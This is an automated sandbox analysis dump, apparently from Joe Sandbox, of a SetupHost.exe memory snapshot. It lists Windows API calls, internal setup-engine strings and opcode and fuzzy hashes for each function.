                                                                                                                        • API ID: CurrentFile$Process$CreateMappingSizeThreadView
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521580201-0
                                                                                                                        • Opcode ID: 8db13c22c8f7e4d4f5ee8a16a7ad5ae0a70990cfb262c76e3c6dc3f8e81f8c87
                                                                                                                        • Instruction ID: e14491910ac1bf325f5e8443b46ea57c70c919d5ecdc5db941c76b61ad469afa
                                                                                                                        • Opcode Fuzzy Hash: 8db13c22c8f7e4d4f5ee8a16a7ad5ae0a70990cfb262c76e3c6dc3f8e81f8c87
                                                                                                                        • Instruction Fuzzy Hash: 4F4129B1E01219EFDB148FA8EC95AAEBBB8FB48755F104229E811E7290D7305D01CB20
APIs
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
APIs
• GetProcessHeap.KERNEL32(00000000,0000000C,?,?,?,?,0050FEA4,?,?), ref: 00510137
• HeapAlloc.KERNEL32(00000000,?,?,?,?,0050FEA4,?,?), ref: 0051013E
Strings
• onecore\internal\base\inc\rtl_object_library.h, xrefs: 00510168
• Windows::Rtl::CRtlObjectTypeDescription<class MicrodomWriterImplementation::CMicrodomWriter>::CreateTearoff, xrefs: 00510173
• L;M, xrefs: 00510170
• NewTearoff.Allocate(), xrefs: 00510181
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID: L;M$NewTearoff.Allocate()$Windows::Rtl::CRtlObjectTypeDescription<class MicrodomWriterImplementation::CMicrodomWriter>::CreateTearoff$onecore\internal\base\inc\rtl_object_library.h
• API String ID: 1617791916-976882397
APIs
• SetLastError.KERNEL32(00000057,00000000,0050076D,?,00000000,00000000,00000000,0051E497,?,00000000), ref: 004FE33D
  • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE660
  • Part of subcall function 004FE5FC: GetLastError.KERNEL32(?,?,?,004FE360,?,00000000,00000000,004FF550), ref: 004FE676
  • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6C3
  • Part of subcall function 004FE5FC: _wcsnicmp.MSVCRT ref: 004FE6DB
• GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,0050076D,?,00000000,00000000,00000000,0051E497,?,00000000), ref: 004FE2F1
• GetLastError.KERNEL32(?,00000000), ref: 004FE305
• GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 004FE321
• HeapFree.KERNEL32(00000000,?,00000000), ref: 004FE328
• SetLastError.KERNEL32(00000000,?,00000000), ref: 004FE32F
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: ErrorLast$Heap_wcsnicmp$AttributesFileFreeProcess
• String ID:
• API String ID: 686246089-0
APIs
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,0051E584,?,00000000), ref: 0052B369
• CreateFileW.KERNEL32(00000000,00010000,00000007,00000000,00000003,06200000,00000000,?,?,0051E584,?,00000000), ref: 0052B380
• CloseHandle.KERNEL32(00000000,?,?,0051E584,?,00000000), ref: 0052B38C
• GetLastError.KERNEL32(?,?,0051E584,?,00000000), ref: 0052B398
• SetLastError.KERNEL32(00000000,?,?,0051E584,?,00000000), ref: 0052B3A3
• SetLastError.KERNEL32(00000057,?,?,0051E584,?,00000000), ref: 0052B3AF
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: ErrorLast$File$AttributesCloseCreateHandle
• String ID:
• API String ID: 3033830061-0
APIs
Strings
• NewAttdef = this->AllocateStreamObject(), xrefs: 005151D4
• CMicrodomBuilder::ConsumeAttdef, xrefs: 005151DF
• m_AttdefListTable.FindOrInsertIfNotPresent( ulElementName, NewAttdefList, &pAttdefList), xrefs: 0051537F
• onecore\base\xml\udom_builder.cpp, xrefs: 005151E6
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: __aullrem
• String ID: CMicrodomBuilder::ConsumeAttdef$NewAttdef = this->AllocateStreamObject()$m_AttdefListTable.FindOrInsertIfNotPresent( ulElementName, NewAttdefList, &pAttdefList)$onecore\base\xml\udom_builder.cpp
• API String ID: 3758378126-1433591952
APIs
• memset.MSVCRT ref: 004E80AE
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 004E8168
• GetLastError.KERNEL32 ref: 004E8172
  • Part of subcall function 004F8A19: __EH_prolog3.LIBCMT ref: 004F8A20
Strings
• CSystemHelper::CreateTrayIcon, xrefs: 004E8080
• SetupUI: Creating tray icon..., xrefs: 004E8140
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: ErrorH_prolog3IconLastNotifyShell_memset
• String ID: CSystemHelper::CreateTrayIcon$SetupUI: Creating tray icon...
• API String ID: 1564345637-1340830530
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: H_prolog3
• String ID: CSystemHelper::SetMainTitle$SetupUI: Setting main title: [%s]
• API String ID: 431132790-2238234619
APIs
• memset.MSVCRT ref: 004E8213
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 004E827C
• GetLastError.KERNEL32(?,?,00000000), ref: 004E8286
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: ErrorIconLastNotifyShell_memset
• String ID: CSystemHelper::RemoveTrayIcon$SetupUI: Removing tray icon...
• API String ID: 501942869-4207634123
                                                                                                                        • Opcode ID: b33213d7f76e3506a768fea4f4b429aadafcd6110595576bea98bda8d8ed543e
                                                                                                                        • Instruction ID: d9b80bb9e7aaec3402a4f40f506973f504c48378e65503ae2178efdcdfdf1f20
                                                                                                                        • Opcode Fuzzy Hash: b33213d7f76e3506a768fea4f4b429aadafcd6110595576bea98bda8d8ed543e
                                                                                                                        • Instruction Fuzzy Hash: FF31D074B006188BDB119FA59C59A3EB7B9FF88315F0404AFE905A7380CB749E058B84
APIs
• __EH_prolog3_GS.LIBCMT ref: 0054D306
• memset.MSVCRT ref: 0054D34E
• RtlGetVersion.NTDLL ref: 0054D367
  • Part of subcall function 004F9CA1: GetModuleHandleExW.KERNEL32(00000001,ntdll.dll,?,?,?,?,00000000,?,004E7B5C), ref: 004F9CD7
  • Part of subcall function 004F9CA1: GetLastError.KERNEL32(?,?,?,00000000,?,004E7B5C), ref: 004F9CE1
Strings
Similarity
• API ID: ErrorH_prolog3_HandleLastModuleVersionmemset
• String ID: %d.%d$%d.%d.%d.%d
• API String ID: 1866922265-3157913242
• Opcode ID: 59497a7429daaee35544efadf7297f6e72a1d2f99be1b7bc6f30020f41c6825b
• Instruction ID: 4b9512b4de6fbd28cc5ce303cd29648605de401828ecf7970b68e58ea3f1a747
• Opcode Fuzzy Hash: 59497a7429daaee35544efadf7297f6e72a1d2f99be1b7bc6f30020f41c6825b
• Instruction Fuzzy Hash: D2317271E002299BCF25AF65CC957EDB6B5BF48308F1004E9E609A7241EB78AF44CF54
APIs
Strings
• BUCL::Rtl::Add<SIZE_T>( sizeof(MICRODOM_HEADER), cbStringPoolSize, cbDomLayoutSize, cbPositionDataSize, cbDoctypeDataSize, cbRequiredSize), xrefs: 00514583
• CMicrodomBuilder::ConstructAndWriteMicrodom, xrefs: 00514575
• onecore\base\xml\udom_builder.cpp, xrefs: 0051456A
• <GM, xrefs: 00514572
Similarity
• API ID: memset
• String ID: <GM$BUCL::Rtl::Add<SIZE_T>( sizeof(MICRODOM_HEADER), cbStringPoolSize, cbDomLayoutSize, cbPositionDataSize, cbDoctypeDataSize, cbRequiredSize)$CMicrodomBuilder::ConstructAndWriteMicrodom$onecore\base\xml\udom_builder.cpp
• API String ID: 2221118986-2803345340
• Opcode ID: 4fbe492a8af74db238011328c0d0bf4a6f17dbd5edefde1dc72862377f90fbf3
• Instruction ID: 01560cd6f1bafc93cd1291d089fc6180615742818c8fd6568d6cf172728e0d91
• Opcode Fuzzy Hash: 4fbe492a8af74db238011328c0d0bf4a6f17dbd5edefde1dc72862377f90fbf3
• Instruction Fuzzy Hash: 835183B2E0071A8BDF00DFA4DC856DEBBB6BF94314F15492AE421E7241E774E5448F54
APIs
• GetProcessHeap.KERNEL32(00000000,00000028,?,00000000,00000278,00513C5C,00000000,000000FF,000000FF,?,?,?,00000000,?), ref: 005170E4
• HeapAlloc.KERNEL32(00000000), ref: 005170EB
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 0051713E
• HeapFree.KERNEL32(00000000), ref: 00517145
Strings
Similarity
• API ID: Heap$Process$AllocFree
• String ID: \<Q
• API String ID: 756756679-4118287963
• Opcode ID: e2cf42550559680bb3902036b600c4aa45c8a0efe0f55deaac847772f25080d6
• Instruction ID: 3ff3254b7571f58ba3fd56c99c54dde0e188417a06f42e10b69bcc2595f170cb
• Opcode Fuzzy Hash: e2cf42550559680bb3902036b600c4aa45c8a0efe0f55deaac847772f25080d6
• Instruction Fuzzy Hash: 77513E79A0470AAFEB14CF68C854AAABFB9FF4D310F148499E815DB250D731D945CB60
APIs
• GetProcessHeap.KERNEL32(00000008,00000054), ref: 0052B3E2
• HeapAlloc.KERNEL32(00000000), ref: 0052B3E9
• GetLastError.KERNEL32 ref: 0052B3F8
• GetLastError.KERNEL32 ref: 0052B40E
Strings
Similarity
• API ID: ErrorHeapLast$AllocProcess
• String ID: WimBufferToHexString
• API String ID: 4104531043-2611935240
• Opcode ID: cb3b1abcc5efa0c9366e042ecb6ed1103bf9e273e3b789b4b5a1dafadd24c525
• Instruction ID: a161b189bac1b9d6db15e3c4bfd0b96abbf949455ba4120b6b0689b86ae893ee
• Opcode Fuzzy Hash: cb3b1abcc5efa0c9366e042ecb6ed1103bf9e273e3b789b4b5a1dafadd24c525
• Instruction Fuzzy Hash: 9E2108756103359BEB006F69EC9576ABBA5FF46311B018126ED04DB392E730DD00D7E5
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,59C8DCBE,033264D0,00000000,00000000,00000000,00551005,000000FF,?,00540189), ref: 0054027D
• HeapFree.KERNEL32(00000000,?,00540189), ref: 00540284
• GetProcessHeap.KERNEL32(00000000,00000008,?,00540189), ref: 0054029E
• HeapFree.KERNEL32(00000000,?,00540189), ref: 005402A5
• GetProcessHeap.KERNEL32(00000000,00000000,?,00540189), ref: 005402B5
• HeapFree.KERNEL32(00000000,?,00540189), ref: 005402BC
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 9a186b6e4de02507c089a3c451bafd16ae4f5974a111d9204efbf529616e9e90
• Instruction ID: 6c1e2483868d48339c830a95c69d21324aa97b803c60455662bbcc62cd15bd68
• Opcode Fuzzy Hash: 9a186b6e4de02507c089a3c451bafd16ae4f5974a111d9204efbf529616e9e90
• Instruction Fuzzy Hash: 0C01A53A608704BBC7115B64EC5DB5B7FACFBA8752F140569F501C72D0CF7498048A60
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0054F272
• GetCurrentProcessId.KERNEL32 ref: 0054F281
• GetCurrentThreadId.KERNEL32 ref: 0054F28A
• GetTickCount.KERNEL32 ref: 0054F293
• QueryPerformanceCounter.KERNEL32(?), ref: 0054F2A8
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 49899a2540bdb47769bee8568804a78c5bfb9d2e657c359a38fa2c6e4e7baa93
• Instruction ID: e8b25e55215b617c0faafac33b183013e180ef3d74fd7ae78c576b8bf8459bb5
• Opcode Fuzzy Hash: 49899a2540bdb47769bee8568804a78c5bfb9d2e657c359a38fa2c6e4e7baa93
• Instruction Fuzzy Hash: 5F113A75D05208EBCF11DBB8E9586DEBBF4FF68316F5148A5E801E7210E630AB44AB00
APIs
• GetLastError.KERNEL32(00000000,?,?,?,?,00541567,59C8DCBE,00000000,033292B8,?,0055103B,000000FF,?,00541659,?,59C8DCBE), ref: 005413E5
Strings
Similarity
• API ID: ErrorLast
• String ID: <unnamed>$CBlackboard::Close$CBlackboard::Close: %s.$onecore\base\ntsetup\panther\engine\bb.cpp
• API String ID: 1452528299-3470024171
• Opcode ID: b79587feac618a9b32b65b75e4499542cb158625795073ca0bb9086f95d59d4a
• Instruction ID: 66e286c7d19ecbdee294323f587fad44f40cf73aca0c3eeea0cd0139070df5df
• Opcode Fuzzy Hash: b79587feac618a9b32b65b75e4499542cb158625795073ca0bb9086f95d59d4a
• Instruction Fuzzy Hash: D2014972340B063BDF201E915CC6EBB3AADEBC0B59714453FF91842680DA71AC00C6AC
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,00526DD1,?,00000000,00000000,00526E66,00000000,00000000,00000090,0051E0C5,?,00000000,00000000), ref: 005270C2
• HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005270C9
• GetProcessHeap.KERNEL32(00000000,?,?,?,00526DD1,?,00000000,00000000,00526E66,00000000,00000000,00000090,0051E0C5,?,00000000,00000000), ref: 005270DE
• HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005270E5
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,00526DD1,?,00000000,00000000,00526E66,00000000,00000000,00000090,0051E0C5,?,00000000,00000000), ref: 005270F4
• HeapFree.KERNEL32(00000000,?,00000000,00000000,0051E358,?,?,00000000), ref: 005270FB
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
APIs
• __EH_prolog3.LIBCMT ref: 004F82EB
• SysAllocString.OLEAUT32(00000000), ref: 004F8331
• SysFreeString.OLEAUT32(00000000), ref: 004F835F
Strings
• CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsValues, xrefs: 004F8310
Similarity
• API ID: String$AllocFreeH_prolog3
• String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsValues
• API String ID: 2967515224-193024389
APIs
• __EH_prolog3.LIBCMT ref: 004F8376
• SysAllocString.OLEAUT32(00000000), ref: 004F83BC
• SysFreeString.OLEAUT32(00000000), ref: 004F83EA
Strings
• CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsParameters, xrefs: 004F839B
Similarity
• API ID: String$AllocFreeH_prolog3
• String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsParameters
• API String ID: 2967515224-2852037422
APIs
• __EH_prolog3.LIBCMT ref: 004F8401
• SysFreeString.OLEAUT32(?), ref: 004F8467
  • Part of subcall function 004F858F: __EH_prolog3.LIBCMT ref: 004F8596
  • Part of subcall function 004F858F: SysFreeString.OLEAUT32(00000000), ref: 004F86B4
  • Part of subcall function 004F858F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F86C1
  • Part of subcall function 004F858F: HeapFree.KERNEL32(00000000), ref: 004F86C8
• _wtoi.MSVCRT(?,00000000,?,00000004,004EB389,DUCHANNELS_FLAG,?,00000000), ref: 004F8452
Strings
• CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsDword, xrefs: 004F8420
Similarity
• API ID: Free$H_prolog3HeapString$Process_wtoi
• String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsDword
• API String ID: 3600190553-2059675238
APIs
Strings
• *** Assertion failed: %s*** Source File: %s, line %ld, xrefs: 0051B3E9
• CsP, xrefs: 0051B3B1
Similarity
• API ID: PrintRaiseStatus
• String ID: *** Assertion failed: %s*** Source File: %s, line %ld$CsP
• API String ID: 2749562092-3906010137
APIs
• GetLocalTime.KERNEL32(?,Def,?,?,?,?,?,?,?,?,00540A7C), ref: 005403DB
• SystemTimeToVariantTime.OLEAUT32(?,?), ref: 005403E9
Strings
Similarity
• API ID: Time$LocalSystemVariant
• String ID: Def$|T
• API String ID: 2941933870-2268153386
APIs
  • Part of subcall function 0051B3AC: DbgPrintEx.NTDLL ref: 0051B3F2
  • Part of subcall function 0051B3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 0051B400
• RtlRaiseStatus.NTDLL(00000000,C000000D), ref: 0050734C
Strings
• onecore\base\xml\udom_modify.cpp, xrefs: 0050731B
• Windows::uDom::Rtl::RtlDestroyMicrodomUpdateContext, xrefs: 00507326
• RtlIsMicrodomUpdateContextValid(TheContext), xrefs: 00507334
Similarity
• API ID: RaiseStatus$Print
• String ID: RtlIsMicrodomUpdateContextValid(TheContext)$Windows::uDom::Rtl::RtlDestroyMicrodomUpdateContext$onecore\base\xml\udom_modify.cpp
• API String ID: 1346358973-3284681492
APIs
• RegOpenKeyExW.ADVAPI32(?,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,00000000), ref: 00501124
• RegCloseKey.ADVAPI32(00000000,?,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,00000000), ref: 00501136
• SetLastError.KERNEL32(00000000,?,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,00000000), ref: 00501145
Strings
• SYSTEM\CurrentControlSet\Control\MiniNT, xrefs: 0050111E
Similarity
• API ID: CloseErrorLastOpen
• String ID: SYSTEM\CurrentControlSet\Control\MiniNT
• API String ID: 3190611558-2757998475
APIs
  • Part of subcall function 005255C6: CreateFileW.KERNEL32(00000000,C0000000,00000007,00000000,00000002,-080000FF,00000000,?,00000008,00000000,00528CDB,00528CDB,?,005289FD,00000000), ref: 00525625
  • Part of subcall function 0051F4B4: GetFileSizeEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88), ref: 0051F50C
  • Part of subcall function 0051F4B4: GetLastError.KERNEL32(?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000), ref: 0051F516
  • Part of subcall function 0051F4B4: GetLastError.KERNEL32(?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000), ref: 0051F52C
  • Part of subcall function 0051F4B4: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000), ref: 0051F58E
  • Part of subcall function 0051F4B4: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,005234C3,00000000,?,?,00000000,00000000,?,00000000,0051DD88), ref: 0051F595
• GetLastError.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 0052353B
• CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000,00000000,?,0051E028,?,00000000), ref: 00523546
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000), ref: 00523557
• HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000), ref: 0052355E
• SetLastError.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,0051DD88,?,00000000,00000000), ref: 00523569
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: ErrorHeapLast$FileFreeProcess$CloseCreateHandleSize
• String ID:
• API String ID: 3165482735-0
• Opcode ID: 362e53a068c61dae99fbc661b61b0b8b49ea728ac0f292fe5ceb26955bc65bb4
• Instruction ID: 9f9ded375ac08ab92f3e0b1d39386ae566f8b4633f92ad6fc14840ad01d6bb77
• Opcode Fuzzy Hash: 362e53a068c61dae99fbc661b61b0b8b49ea728ac0f292fe5ceb26955bc65bb4
• Instruction Fuzzy Hash: C731F671F006256BCF18ABB8B84AA7E7FAABFD2314F084568E502972D1DB74CE019740
APIs
• memset.MSVCRT ref: 00531410
• memmove.MSVCRT(?,0000FFF8,0000FFF9,?,0000FFF8,?,0000FFF8,?,?,?,?,?,?,?,00530CB2,?), ref: 00531430
• memset.MSVCRT ref: 0053144E
• memmove.MSVCRT(?,0000FFF8,0000FFF8,?,00000000,00001FFF,?,0000FFF8,0000FFF9,?,0000FFF8,?,0000FFF8,?,?,?), ref: 00531461
• memmove.MSVCRT(?,?,?,?,0000FFF8,0000FFF8,?,00000000,00001FFF,?,0000FFF8,0000FFF9,?,0000FFF8,?,0000FFF8), ref: 00531477
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: memmove$memset
• String ID:
• API String ID: 3790616698-0
• Opcode ID: f5e8b80cc53a07e9b85e5f8db9c5971bcee2114a5c2b002ab0708202fed7e79f
• Instruction ID: 6c8d4c877019f22c78116cd04ef9607104fddd5b1b0edebada4a36cd09c6a6dd
• Opcode Fuzzy Hash: f5e8b80cc53a07e9b85e5f8db9c5971bcee2114a5c2b002ab0708202fed7e79f
• Instruction Fuzzy Hash: 24217176600A09AFD714DBB9C99AD6FBBEDEF88714B00062EE446C7A41DA70FD018B50
APIs
• GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,00000000), ref: 0052A2CD
• HeapAlloc.KERNEL32(00000000), ref: 0052A2D4
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0052A327
• HeapFree.KERNEL32(00000000), ref: 0052A32E
• SetLastError.KERNEL32(0000000E), ref: 0052A343
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$AllocErrorFreeLast
• String ID:
• API String ID: 3300557996-0
• Opcode ID: 5b452b0b1f88bb51b23b1636f5e0ed04bfc5b6a206f738ce788cf0242fed0ffb
• Instruction ID: ba5f37a10d5f73dc41a1d64097909a8a6587ef0a0e54ad5712b7174a3f09a79c
• Opcode Fuzzy Hash: 5b452b0b1f88bb51b23b1636f5e0ed04bfc5b6a206f738ce788cf0242fed0ffb
• Instruction Fuzzy Hash: 1C21AE75E00325EFCB14CFA9E99876EBFB5FF99312F118458D409A7280C7309D058B91
APIs
• GetProcessHeap.KERNEL32(00000008,00000020,00000001,?,?,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001), ref: 00524091
• HeapAlloc.KERNEL32(00000000,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 00524098
• SetLastError.KERNEL32(0000000E,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 005240A6
  • Part of subcall function 00524131: GetProcessHeap.KERNEL32(00000008,00000C00,00524083,00000001,?,?,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000), ref: 00524138
  • Part of subcall function 00524131: HeapAlloc.KERNEL32(00000000,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 0052413F
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 005240EC
• HeapFree.KERNEL32(00000000,?,00523956,?,?,0051E358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 005240F3
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: Heap$Process$Alloc$ErrorFreeLast
• String ID:
• API String ID: 2557328389-0
• Opcode ID: 9974b1c03187243795e4aca07a100e4b871a3a00eea676ee4389180b4243ca75
• Instruction ID: 0f26e941232950bff3b1585b8a03411cb2ffb9b1c85d148cca3e459c327ea9de
• Opcode Fuzzy Hash: 9974b1c03187243795e4aca07a100e4b871a3a00eea676ee4389180b4243ca75
• Instruction Fuzzy Hash: 11114F75604316EBDB109FA5E889B6B3FA8BF5A315F008469FA05DB1C0DE70D9449F60
APIs
• EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00528E5B,?,00528EC0,00000000,005292C0,00000001,?,?,?,00000000,00000000,?), ref: 00529237
• LeaveCriticalSection.KERNEL32(00000000,?,00528CDB,?,00000000,00000000), ref: 00529256
• GetProcessHeap.KERNEL32(?,?,?,00528CDB,?,00000000,00000000), ref: 0052926C
• HeapAlloc.KERNEL32(00000000,?,00528CDB,?,00000000,00000000), ref: 00529273
• SetLastError.KERNEL32(00000008,?,00528CDB,?,00000000,00000000), ref: 00529281
Memory Dump Source
• Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
• Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
Similarity
• API ID: CriticalHeapSection$AllocEnterErrorLastLeaveProcess
• String ID:
• API String ID: 2288769807-0
• Opcode ID: d99a737e3083e0ea9cfcf3fb34773d45773dbe365940baf6cea218177aa6c47a
• Instruction ID: 0fa7089b9a257117d8b809ea11281162cd63093c28a263057653be363051b6b5
• Opcode Fuzzy Hash: d99a737e3083e0ea9cfcf3fb34773d45773dbe365940baf6cea218177aa6c47a
• Instruction Fuzzy Hash: F5216D79601B01EBCB24CF18E994A22BBF5FF99711B10592EE44AC3B40D730F8448F90
APIs
  • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF023
  • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF02F
  • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF041
  • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF053
  • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF065
  • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF077
  • Part of subcall function 004FEFEF: memset.MSVCRT ref: 004FF0B7
  • Part of subcall function 004FEFEF: GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 004FF0CE
